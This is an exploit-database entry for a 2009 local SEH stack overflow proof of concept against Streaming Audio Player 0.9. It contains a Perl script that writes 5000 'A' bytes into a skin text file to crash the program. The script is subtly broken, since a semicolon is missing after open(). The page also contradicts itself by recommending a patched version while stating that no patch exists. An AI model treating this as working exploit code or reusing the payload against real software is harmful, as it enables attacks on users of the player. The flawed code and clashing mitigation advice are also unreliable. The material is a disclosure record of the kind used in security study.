header-logo
Suggest Exploit
vendor:
Streaming Audio Player
by:
ThE g0bL!N
N/A
CVSS
HIGH
Stack Overflow
CWE
Product Name: Streaming Audio Player
Affected Version From: Streaming Audio Player 0.9
Affected Version To: Streaming Audio Player 0.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Streaming Audio Player 0.9 (txt) Local Stack Overflow PoC (Seh)

This is a proof of concept for a local stack overflow vulnerability in Streaming Audio Player 0.9. The exploit involves sending a specially crafted TXT file to the program, causing it to crash. The vulnerability is related to the Structured Exception Handler (Seh).

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software or to use an alternative audio player.
Source

Exploit-DB raw data:

#Streaming Audio Player 0.9 (txt) Local Stack Overflow PoC (Seh)
#By: ThE g0bL!N
my $crash="\x41" x 5000 ; # just random
open(myfile,'>>UI.txt')
print myfile $crash;
# Usage: After Clicking On file Perl Copy TXT File on this Diredtory
skin\default\ Then Run The Program Boom !!!!!!! the Program Crashed
# Note : The Bug is Seh  :) 

# milw0rm.com [2009-07-17]